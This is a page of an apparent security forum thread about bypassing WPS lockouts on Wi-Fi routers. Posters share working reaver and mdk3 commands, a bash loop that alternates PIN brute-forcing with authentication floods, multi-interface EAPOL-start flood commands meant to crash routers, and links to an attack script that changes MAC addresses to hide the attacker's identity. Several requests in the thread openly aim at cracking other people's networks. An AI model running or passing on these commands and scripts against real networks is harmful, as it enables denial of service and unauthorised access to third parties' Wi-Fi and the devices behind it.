Page 3 of 4 FirstFirst 1234 LastLast
Results 101 to 150 of 161

Thread: MDK3 Secret Destruction Mode

  1. #101
    Join Date
    2014-Feb
    Posts
    2

    Original Posting - Content Deleted

    Hello All,

    Any clue where the original posting went? I was showing a buddy the guide that was written out, but noticed it says content deleted. Does anyone have the original?

    Thanks!

  2. #102
    Join Date
    2014-Feb
    Posts
    2
    Hello All,

    Any clue where the original posting went? I was trying to show a buddy the post, but noticed that the "Content Deleted" on the original post. Anyone have the original guide?

  3. #103
    Quote Originally Posted by shaberu View Post
    try reaver with -L to ignore locks and -a to auto select better configurations
    Code:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -L -a



    Thank you very much !! It helped but didnt solve my problem... I used your code and at least i didnt get the "re-trying in 60 seconds" thing. but it is stuck on 0.04% and doesnt wanna go further... so its the same as it would have the 60 seconds retrying..

    Im really confused how i could hack this wps locked wpa2-psk router..

    Maybe could you tell me your email so we can talk or teamviewer or vnc? Or if you dont want that we can keep messaging here! I dont want to give up And thanks everyone for helping!

    Just please someone tell me what to do. Maybe i didnt unlock the wps sucsessfully?

  4. #104
    Quote Originally Posted by shaberu View Post
    try reaver with -L to ignore locks and -a to auto select better configurations
    Code:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -L -a
    Even those routers that dont have wps locks i get the same response with reaver... for 10-30 mins. They stuck on 0.04% and i get this error message that "WPS transaction failed (code 0x02).. What am i doing wrong ? How can i do it sucsesfully?

  5. #105
    Have a look here http://code.google.com/p/reaver-wps/.../detail?id=167

    I havn't read through it myself but that is the main area for problems related to reaver or do a google search for "WPS transaction failed (code 0x02)"

    Rab.

  6. #106
    Join Date
    2014-Mar
    Posts
    1
    Here is what i am using to get around locks...
    while :; do echo
    echo "starting reaver...";
    echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
    echo ...
    echo ...
    echo ...
    timeout 10s mdk3 mon0 a -a <bssid> -m
    sleep 60
    done

    First off, you need to run "apt-get timeout install" to get the timeout app. After that the script should work. The first part is starting reaver and restoring session and executing 5 attempts before exiting. The second part is executing the mdk3 command that will timeout after 10 seconds of it running. at this point, the router should be rebooting (atleast the one im trying it on did). Next put a sleep for 60 seconds to allow the router to reboot and then the script will loop back to the beginning.

  7. #107
    Join Date
    2014-Feb
    Posts
    7
    hello FAHQ please please explain more, how can i put the commands ?

  8. #108
    Join Date
    2014-Feb
    Posts
    7
    hello is there any help from you FAHQ ?

  9. #109
    Join Date
    2014-Feb
    Posts
    7
    hello ppl is there any trick to unlock locked wps ?

  10. #110
    Join Date
    2014-Feb
    Posts
    7
    any clue guys ?

  11. #111
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by saido5 View Post
    hello FAHQ please please explain more, how can i put the commands ?
    Make a blank document in your root folder called reset.sh. Then, open the document in a text editor and paste this into it:
    Code:
    while :; do echo
    echo "starting reaver...";
    echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
    echo ...
    echo ...
    echo ...
    timeout 10s mdk3 mon0 a -a <bssid> -m
    sleep 60
    done
    Replace the values inside the code with the values of your target. If you don't know what I mean by that, then learn the basics of aircrack and reaver.

    When you're done, open terminal and run:
    Code:
    bash reset.sh

  12. #112
    Join Date
    2013-Jun
    Posts
    125

    Another effective way to reset a wps access point

    Quote Originally Posted by saido5 View Post
    hello ppl is there any trick to unlock locked wps ?

    To everyone-another effective method to unlock wps mechanism on a wps router!

    Quote Originally Posted by repzeroworld View Post
    TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    i have found a way to effectively flood a new model (either year 2012/2013 manufactured) cisco router to make it reboot with a wps locked
    status as "NO". Also i will prove that using Authentication DOS mode flooding has no effects of flooding THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details found found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your mac address. Also if you try a 3 pins the router starts
    an exponential clock that rate limit another counple of pins reaver tries and then the router totally lock itself for one/two day.
    even if i gave reaver the option to try 1 pin every 3 minutes (worthless).. after a couple of pin attempts it locks up one/two days.
    I will release my method for sure..gave me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which i am going to reveal but it relates using mdk3

    After using my method the router reboot and it needed sometime to "thaw off" before sending EAP again...this is roughly aorund
    a couple of seconds..if you don't leave it to thaw off and use the reaver command, you will recieve alot of EAP timeout messages before
    the router catches itself.but it is worth it rather than waiting for days for the router to unlock itself!!Also, it hops to another channel when it reboots so it
    is not wise to run reaver with a -c flag...i suppose this COULD part of cisco security mechanism feature..

    ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”

    THIS LINK *REMOVED* HAS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.

    BRIEF NOTES
    I focused on the stated Cisco Access Point that I came across with the new exponential wps mechanism.

    THE TWO ATTACKS I USED ARE:
    1. MDK3 Authentication DOS Flood Attack- floods the AP with too much fake clients so that the router is overloaded
    2. EAPOL Start Flood Attack- Authenticates to the AP and sends too much EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboot itself.

    MDK3 AUTHENTICATION DOS FLOOD ATTACK
    This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!.
    ( I have three wireless adapter- AWUS036NHA, AWUS036NH and TP-LINK 722N and I use AWUS036NHA and AWUS036NH to carry out this attack numerous times)
    HOW I ATTACKED THIS ACCESS POINT USING AUTHENTICATION DOS FLOOD ATTACK
    I started my wireless card on three monitor interface, mon0, mon1 and mon2
    In three terminal, I use the command line
    mdk3 mon0 a –a C87:19:0A:BF:35 #TERMINAL 1
    mdk3 mon1 a –a " " " # TERMINAL 2
    mdk3 mon1 a –a " " " #TERMINAL 3
    Note:
    I ensure that the router was wps locked permanently so that I can test the effectiveness of the attack. Also, a point to note, I did not use one command line with one monitor interface since it was futile. I blasted the router on three monitor interfaces!.Now I am blasting away the router for hours!. After blasting away the Access Point is still locked! I tried this attack for days to convince myself!.


    MDK3 EAPOL START FLOOD ATTACK
    I started my wireless card on three monitor interface, mon0, mon1 and mon2
    mdk3 mon1 x 0 –t C87:19:0A:BF:35 –n Riznet –s 100 #TERMINAL 1 (SEE VIDEO FOR REASON OF USING –S 100 FLAG)
    mdk3 mon1 x 0 –t " " " –n Riznet –s 100 # TERMINAL 2
    mdk3 mon1 x 0 –t " " " –n Riznet –s 100 #TERMINAL 3
    Note: I tried again using 1 monitor interface to carry out the attack but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting!. In this scenario I tried blasting the router in three terminals. This “Shock Attack” method ran for about 20 seconds and the router reboot with wps locked status as “NO”. I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS) !!. Also packet analysis significantly helped me to understand the connection between EAPOL and a router behavior to open authentication request which makes it impossible to stick to one method for flooding ALL AP (see the video link above).

    BASH SCRIPT WRITING
    Soon I will write a bash script to execute all the steps in my video (I need time to chill….).

    OTHER ACCESS POINTS INVESTIGATED
    I Have Also Assessed The Behaviour Of Three Other Cisco Access Points That Rate Limit Pin In A Systematic Way But Did Not Locked Up in an exponential manner!. I will give gave an update if I do come across any other access points that behaved somewhat different. Do share your experience in relation to any new updates on wps!
    Last edited by g0tmi1k; 2014-12-09 at 15:12. Reason: Youtube

  13. #113
    Join Date
    2013-Jul
    Posts
    844
    Your approach is both novel and intriguing. Those involved with the matter of reseting routers remotely should study this closely.

    We realize successful WPS reset is dependent on a number of factors to include router make,signal strength and clients associated just to name a few. However Musket Teams will attempt to duplicate your results - however we will only report if we are successful.

  14. #114
    Join Date
    2014-Feb
    Posts
    7
    hello hello friends thank you so much soxrok2212 you are great guy i am so grateful for your help

  15. #115
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by zenefuleimnek View Post
    Thank you for the reply! What should appear with "wash" ? what should i see when i open that?

    Because when i type was -i mon0

    This is what i can see:

    And i dont know when i can start the reaver to get the wpa2 key. Please help me.

    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    instead of "wash -i mon0 -c" you can try "wash -i mon0 "-C" [capital C] it will ignore bad packets..Another reason could also be simply that adapter is recieving bad packets that cannot be fully interpreted by the wash tool.

  16. #116
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by polyphemus View Post
    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened....but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though...would be cool if the former was true though!
    see comment # 112 hope it helps in some way! enjoy

  17. #117
    Join Date
    2013-Jun
    Posts
    125
    ..........
    Last edited by repzeroworld; 2014-04-13 at 15:32.

  18. #118
    Join Date
    2013-Jun
    Posts
    125
    TO: EVERYONE-THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
    I have underestimated this attack!. IT WORKS ON ALMOST ALL THE AP THAT I PICKED UP THAT HAS THE WPS RATE LIMITING FEATURE..
    Despite some AP refuses to accept to many eapol packets, one mdk3 authenticates it floods the AP quickly until a deauthentication
    packet is sent from the AP to break the connection.

    FOR FURTHER PROOF CHECK ANOTHER VIDEO IS POST ON MY CHANNEL
    LINK *REMOVED*


    Also, instead of running three attacks in three terminal, i used one terminal to carry out three attacks RUNNING AT THE SAME TIME using

    EXAMPLE
    #timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec) & timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>

    PENDING: I AM CURRENTLY WRITTING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINSHED.IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK IN PROGRESS SCRIPT!
    Last edited by g0tmi1k; 2014-12-09 at 15:11. Reason: Youtube

  19. #119
    Join Date
    2013-Jun
    Posts
    125

    RevdK3.sh Script- reaver and mdk3

    I have finally finished a script that took me a couple of days to complete. i would be grateful if others can test this out. what the script does.
    1. It ask the user information on the target
    2. It runs reaver and waits when reaver detects the AP is rate limiting pin
    3. when the AP is 'rate limting pins' , the script pause reaver and floods the AP for a time you choose
    4. after flooding, it detects if the AP is still rate limiting pins, if it is, then it continues to flood the AP until it unlocks itself
    5. Once WPS is unlocked, the script continues reaver

    those interested in testing can send me a email or a private message on my channel.
    *REMOVED*
    cheers!

    The script is also shared through torrent but it takes a while to upload. the link below is the location of the torrent
    http://www.legittorrents.info/index....&page=torrents
    Last edited by g0tmi1k; 2014-12-09 at 15:11. Reason: youtube

  20. #120
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Wow, I never expected to see this thread reach 50,000 views. I guess its pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options of:
    1.) mac changing after a specified number of pin trials
    2.) reaver incorporated, of course ;D
    3.) MDK3 auth flodd
    4.) beacon flood
    5.) MIC failure
    6.) deauth
    7.) EAPOL failure

    More??

    It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking a script here, a full blown GUI.

    I'm doubtful but the community here is pretty big. And maybe, just maybe we could get it pushed to be a standard tool in Kali!

  21. #121
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams wish to note that there are no mac address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware installed mac address. We have no comment on the program itself as until we write these routines into the script we will only do cursory tests.

  22. #122
    Join Date
    2013-Jun
    Posts
    125

    To: Everyone

    Quote Originally Posted by mmusket33 View Post
    Musket Teams wish to note that there are no mac address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware installed mac address. We have no comment on the program itself as until we write these routines into the script we will only do cursory tests.
    Please note i have written the little script ReVdK3 for free distribution and to contribute worthily to kali linux forum and mdk3 team,
    it is COMMON COURTESY for any team or individual that wants to improve this script, request my consent or create the script with a
    with an invented name of their own. This is because improvement of this script is set aside by me in the near future....thank you...

  23. #123
    Join Date
    2013-Jul
    Posts
    844
    A Peer Review of ReVdK3

    This thread will not discuss the ability of Revdk3 to actually reset a router.

    Musket Teams have been working with soxrox2212 since this mdk3 approach to reset routers remotely was conceived.The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
    This program tries to run three(3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3(ie mon0,mon1,mon2). We have tested the stock ReVdK3 and find no indiction that $MON2 and $MON3 are functioning.

    When running ReVdk3 against the targetAP, Airodump-ng clearly shows only one(1) mdk3 process running.

    To prove these processes were not masking themselves one over the other.

    We ran the three(3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three(3) processes functioning when run from separate terminal windows, and only one(1) process when running RevdK3.

    To further prove this we gave each monitor ie $MON1, $MON2, $MON3 an individual mac address. When running the three(3) mdk3 attacks from Eterm windows embedded in the reVdk3 program these different mac addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three(3) monitor/mac address pairs. When we ran the stock ReVdk3 only a single process running $MON1 was seen.

    We believe the authors original approach using three(3) terminal windows was the correct one.

    If you want to run three(3) separate processes off the physical device $WLAN from a bash script you need to run Eterm or Xterm windows, one(1) for each process.

    As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution starting at line 438 in the stock program can be seen below:

    if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then

    Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    fi

    killall -q Eterm &> /dev/null


    MTA and MTD
    Last edited by mmusket33; 2014-05-06 at 06:14.

  24. #124
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by mmusket33 View Post
    A Peer Review of ReVdK3

    This thread will not discuss the ability of Revdk3 to actually reset a router.

    Musket Teams have been working with soxrox2212 since this mdk3 approach to reset routers remotely was conceived.The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
    This program tries to run three(3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3(ie mon0,mon1,mon2). We have tested the stock ReVdK3 and find no indiction that $MON2 and $MON3 are functioning.

    When running ReVdk3 against the targetAP, Airodump-ng clearly shows only one(1) mdk3 process running.

    To prove these processes were not masking themselves one over the other.

    We ran the three(3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three(3) processes functioning when run from separate terminal windows, and only one(1) process when running RevdK3.

    To further prove this we gave each monitor ie $MON1, $MON2, $MON3 an individual mac address. When running the three(3) mdk3 attacks from Eterm windows embedded in the reVdk3 program these different mac addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three(3) monitor/mac address pairs. When we ran the stock ReVdk3 only a single process running $MON1 was seen.

    We believe the authors original approach using three(3) terminal windows was the correct one.

    If you want to run three(3) separate processes off the physical device $WLAN from a bash script you need to run Eterm or Xterm windows, one(1) for each process.

    As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution starting at line 438 in the stock program can be seen below:

    if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then

    Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    fi

    killall -q Eterm &> /dev/null


    MTA and MTD
    When ReVdK3 was distributed, the script was shortly revised afterwards to correct this problem using a tricky method and was given to my acquintances who williingly volunteer to test.. for a second reminder see below.

    "Please note i have written the little script ReVdK3 for free distribution and to contribute worthily to kali linux forum and mdk3 team,
    it is COMMON COURTESY for any team or individual that wants to improve this script, request my consent or create the script with a
    with an invented name of their own. This is because improvement of this script is set aside by me in the near future....thank you... "

  25. #125
    Join Date
    2013-Jun
    Posts
    125

    Improvements to ReVdK3.sh

    ReVdK3 had some issues that I wasn't aware of when it was shortly distributed.
    I became aware of these bugs when viewers tested the script and provided me with their feedback....
    Thank you to those people who provide their feedback that helped me trace where the problems were...
    Some of the problems were as follows:

    1. whenever the script ran and was terminated, bash left mdk3 running in the background the "while ; do loop problem". if the script was restarted
    this resulted in duplication of many mdk3 processes which affected not only the mdk3 attack but also reaver and the monitor interfaces
    - this issue was fixed by killing all mdk3 process after running and looping again.

    2. the first distributed script ran the mdk3 eapol start flood attack in one terminal!(the script was functioning but it was how bash was interpreting the instructions)...now all three eapol start attack will run in three little terminals!- issue fixed using gnome-terminal command

    3. I increased the number of packets injected for eapol attacks to helped to reboot one of the access point that took long to reboot/ unlock (WPS).


    4. I added instructions to the script to change your mac address of monitor and wireless interfaces..this is to help hide your identity

    the old script was taken off of the torrent link. the link for the new script is below:

    http://www.legittorrents.info/index....&page=torrents


    NOTE:
    MDK3 WILL NOT RESET ALL ROUTERS BASED ON FEEDBACK BUT IS VERY USEFUL. As a result, the revised script can be downloaded
    from the link stated.
    Last edited by repzeroworld; 2014-05-10 at 13:32.

  26. #126
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    If anyone is having trouble in reaver associating to an AP, make sure your wireless card supports wireless N because the target AP may be in N only mode.

  27. #127
    Join Date
    2013-Jul
    Posts
    844
    soxrok2212

    Could you recommend a few wifi adapters supporting N that work with Kali. From a sources of supply perspective could you recommend more then one.

    MTA

  28. #128
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I just purchased an Alfa AWUS051NH on eBay for about $35. It should be delivered within a couple of days and I'll report back after some testing. It's a dual band 150/300mbps card so I should see some speed increases over my AWUS036H, and based on some reviews, it looks pretty promising.

  29. #129
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Got my hands on an Alfa AWUS051NH and I love it. Rt2800 drivers, injection works, and I definitely prefer it over my AWUS036H because the PWR levels in airodump-ng are much more accurate (I don't think its as powerful though...) I haven't extensively tested injection rates yet but it seems very promising. Excellent range too and only about $33 on eBay.
    Last edited by soxrok2212; 2014-05-30 at 01:41.

  30. #130
    Join Date
    2013-Jul
    Posts
    844
    Have you tried boosting the power levels. The routine we use to avoid the negative one issue also boosts an RTL8187 to 30dBm. See our thread Simple Solution to negative one issue. You can download the routines there or we can post them or send them to you if you wish.

    MTA

  31. #131
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams have been working on a different approach to WPS locked routers. Instead of attempting to reset a WPS locked router, we attempted to prevent router WPS locking. Targets were routers known to lock the WPS system after X number of pin requests. We flooded the router with various combinations of mdk3 attacks while simultaneously conducting a reaver attack.
    To date we have had little success! However for those writing reset router programs note the following.
    Reaver was always able to harvest pins while the router was being subjected to various combined mdk3 attacks. Hence there is no reason to start and stop reaver. You can leave it running in the background. If the router locks, no pins will be collected, if the router resets pins will again be harvested even though multiple mdk3 attacks are assaulting the targetAP.

  32. #132
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    So basically if you run mdk3 concurrently with reaver it will never lock out?

  33. #133
    Join Date
    2013-Jul
    Posts
    844
    No we are not saying that.

    We have seen the following against routers in our areas of operation.

    If your target is a router which the WPS systerm is open BUT will lock after x number of pin attempts then:

    1. If you run combinations of mdk3 against the router AND you run reaver at the same time, reaver will continue to collect pins until the router locks. The mdk3 attacks do not disrupt the collection of pins. We have seen routers freeze but no reset and then continue which is congruent with reaver collecting pins. What is important here is that you can run your mdk3 attack(s) and your reaver attack at the same time. Should the router reset reaver will begin collecting pins again until the router locks even though mdk3 is attacking the router. You do not have to run the mdk3 attack then stop the attack and run reaver and then stop reaver and run the mdk3 attack again. Just run both and walk away.

    The only problem here is that router when reset might jump channels.

    For historical reference we had approx 10 target router which were open. We ran mdk3-reaver attacks at the same time and locked all the routers.

    MTA

  34. #134
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Gotcha, so its a bit more time efficient.

  35. #135
    Join Date
    2014-Jun
    Posts
    2
    Hi guys. Can you please modify your script for me so that it starts Reaver with -L (Ignore lock) option and then does 10 attempts and stops, after that start only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stop mdk3 and then resume Reaver with -L (ignore lock) option again and loop like this until WPS is found. Thanks alot waiting your reply. ( and please with only 1 monitor interface)

  36. #136
    Join Date
    2013-Jun
    Posts
    125

    Revdk3-r1.sh release in a couple of days

    Quote Originally Posted by Berj View Post
    Hi guys. Can you please modify your script for me so that it starts Reaver with -L (Ignore lock) option and then does 10 attempts and stops, after that start only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stop mdk3 and then resume Reaver with -L (ignore lock) option again and loop like this until WPS is found. Thanks alot waiting your reply. ( and please with only 1 monitor interface)
    hello..i got your message...hectic working schedule these days...i will modify the script for your taste and send it...send me a private message with your email adds on my channel or kali.....i have finished working on a revision of the script..ReVdK3-r1.sh (revision 1)
    Some of the features of this revised script:
    1. Whenever 25 successive eapol failures is detected, the script will flood the AP for the specified time you choose (eapol start failures are caused by a variety of factors, but i decided to add this feature just to force unresponsive Access Point to overload itself and do a FRESH reboot.)

    2. The script runs aireplay-ng and reaver in ONE terminal..it switches periodically between the two processes without terminating either of them.not SNAPSHOTS of reaver and mdk3.....also it keeps re-running aireplay in the event that it quits because of "no beacon frames" or other reasons....i found that aireplay significantly add persistence to the association process despite reaver can associate by itself.

    3. Good House keeping- the script will automatically remove temporary files associated with the script and ensure all processes are killed prior to a SINGLE (1) SIGINT (Ctrl C) or SIGHUP signal (closing the terminal).

    4. introduce the -S flag in the reaver command line to speed up cracking...

    5. a couple of minor bug fixes

    hmm.....One cold beer to "N1Ksan" who "push" me to do a revision and contributed some of the ideas above..not forgetting how many unstable versions of script i sent him to test........

  37. #137
    Join Date
    2014-Jun
    Posts
    2
    Hey man, I sent you private message here in Kali, please send it to my email.

    I found out that many TP-link router models whose MAC address start with "10-FE-ED" can be used MDK3 (mdk3 a -a bssid -m) for 30 seconds and then it will let you continue reaver for 10 attempts and then do the same thing again and again. But the issue is that WPS will show Locked as Yes even after mdk3 but will let you continue with ignore option -L . Your previous scipts I tried didn't reset those Tplink routers not even let me continue with Ignore lock option.

    Best of luck and thanks again, will test it for you if you have other scripts.

  38. #138
    Join Date
    2014-Jun
    Posts
    1
    Hey friends, i want to test your scripts. Im trying to crack wpa passwords but i fail in all tries. I need some help, some information about this you are working. Send me message plz. ps: sry for my english

  39. #139
    Join Date
    2014-Mar
    Posts
    163
    o think i must say , that one of my wifi cards have broken itself using all the mdk# codes at same time pointing to a specific AP , and it was at its max power .
    resuming , card was not able to transmit again

  40. #140
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    We'll if you set it to max power you probably fried it...

  41. #141
    Join Date
    2013-Jun
    Posts
    125
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www32.zippyshare.com/v/12811261/file.html

    ----------------------------------------
    ReVdK3-r1.sh (Revision 1 README Section |
    ---------------------------------------------------------------------------------------------
    WARNING: |
    Do not use this script without permission from the victim to carry out the specified attacks. |
    |
    This is the first offical revision of ReVdK3.sh script |
    ----------------------------------------------------------------------------------------------

    Script features in this revision

    1. Runs reaver,aireplay-ng in one terminal and detects continously when reaver is rate limiting pins.
    After input of wireless adapter interface..it checks to see if there are any monitor interfaces on that adapter interface. Any existing monitor interfaces are wiped out and three new monitor interfaces are created. The script also uses these interface during the attacking process. In the event that aireplay times out because association issues or switches to "shared key open authentication", the script will re-run aireplay-ng.


    2. Runs mdk3 attacks until reaver detects that the WPS state of the AP has been unlocked. Once WPS has been unlocked it kills all mdk3 attacks and waits until reaver detects WPS has been locked again..this process goes on...

    3. Upon detection of 25 successive EAPOL start failures, the script floods the AP for 60 second to see if the AP will do a fresh reboot!

    4. Killing the script in a terminal will trigger it to remove all tmp files, force all processes started by the script to terminate and wiping out the three monitor interfaces it created..be patient about 1-2 seconds for termination of the script...Also you call close the terminal instead of killing this will send a hang up signal to do the necessary cleaning up..
    Last edited by repzeroworld; 2014-06-17 at 03:02. Reason: to change download link

  42. #142
    Join Date
    2014-Jun
    Posts
    1
    Quote Originally Posted by repzeroworld View Post
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www.legittorrents.info/index....0ddb497eced5b7
    Please seed, I'd like to test this script.

  43. #143
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by repzeroworld View Post
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www.legittorrents.info/index....0ddb497eced5b7
    Getting a "Bad ID" error, not sure if its just because there are no seeds or what but just thought I'd give a heads up...

  44. #144
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by soxrok2212 View Post
    Getting a "Bad ID" error, not sure if its just because there are no seeds or what but just thought I'd give a heads up...
    thanks for the thumbs up....having issues with the link too
    but i did manage to upload it on zippyshare
    the link is below (do tell me if it works):

    http://www32.zippyshare.com/v/12811261/file.html

  45. #145
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    if the file is supposed to be 26.2 kB (26,158 bytes) in size, then yes it works.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  46. #146
    Join Date
    2013-Oct
    Posts
    10
    Awesome job with ReVdK3-r1.sh.

    I was able to use it to crack my Belkin N+ router when the Reaver Pro couldnt attempt not one pin.

    I posted a demonstration here for anyone interested:

    EDIT: Youtube vids not allowed.

    I think you could make the script better by including check for gnome-terminal and apt-get install gnome-terminal for us XFCE fans.
    Also, if the script connected to WPS protected AP as soon as it found the pin would be cool too. (have itsend an email when done)

    Regards,
    Last edited by sickn3ss; 2014-07-06 at 13:20.

  47. #147
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    *Post Deleted* Wrong thread, moved to Belkin Mac Address/SSID Correlation.
    Last edited by soxrok2212; 2014-07-03 at 16:34.

  48. #148
    Join Date
    2014-Jul
    Posts
    1
    Very interesting...

  49. #149
    Join Date
    2014-Jul
    Posts
    2
    Hi, I have a problem with the script. After running it, it asks me to enter wlan0, after that, the scripts start but it returns this error. I am running the script with sudo if thats important. What can be a problem?

    I forgot to enter the pic, I ask moderator to join my two posts, thank you
    Last edited by bolexxx; 2014-07-06 at 13:27.

  50. #150
    Join Date
    2014-Jul
    Posts
    2
    Downloads for useful programs: I will do my best to keep these updated

    Atrophy

    ReVdk3-r1

    FrankenScript 2[/QUOTE]



    Hey can anyone give me a hint of what this little trio is about please? thank you very much and have a nice day.

Similar Threads

  1. MDK3 on 5Ghz
    By klawil in forum General Archive
    Replies: 3
    Last Post: 2017-05-24, 11:50
  2. MDK3 problem
    By wewe73 in forum TroubleShooting Archive
    Replies: 4
    Last Post: 2015-10-26, 14:14
  3. My Secret SSH user ...
    By prompt_32 in forum How-To Archive
    Replies: 2
    Last Post: 2014-01-14, 00:51

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •